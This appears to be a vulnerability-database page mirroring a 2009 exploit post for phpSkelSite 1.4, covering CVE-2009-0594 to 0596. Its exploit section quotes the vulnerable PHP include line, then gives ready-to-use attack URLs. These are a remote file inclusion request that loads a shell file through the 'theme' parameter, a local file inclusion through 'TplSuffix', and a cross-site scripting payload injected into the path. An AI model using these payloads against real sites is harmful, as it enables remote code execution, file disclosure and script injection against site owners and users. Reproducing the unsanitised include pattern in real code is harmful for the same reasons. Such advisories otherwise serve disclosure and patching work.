phpSkelSite 1.4 (RFI/LFI/XSS) Multiple Remote Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052187 漏洞类型
发布时间 2009-02-18 更新时间 2009-02-18
CVE编号 CVE-2009-0594
CVE-2009-0595
CVE-2009-0596
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009020193
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
-----------------:RFI/LFI/xss:-----------------
-------------------------------------------
script:phpSkelSite
   
------------------------------------------------------------------
download from:http://apmuthu.tripod.com/files/phpSkelSite_v1.4.zip
   
------------------------------------------------------------------

........................................................
vul:/skysilver/login.tpl.php line 1

<? include $theme.'/pageheading'.$TplSuffix ; ?>


------------------------------------------------------
Rfi:

http://127.0.0.1/path/skysilver/login.tpl.php?theme=[shell.txt?]

Lfi:

http://127.0.0.1/path/skysilver/login.tpl.php?TplSuffix=[lfi]

***************************************************
xss:
http://127.0.0.1/path/index.php/>"><ScRiPt>alert('ahmadbady')</ScRiPt>
***************************************************
---------------------
Author: ahmadbady
---------------------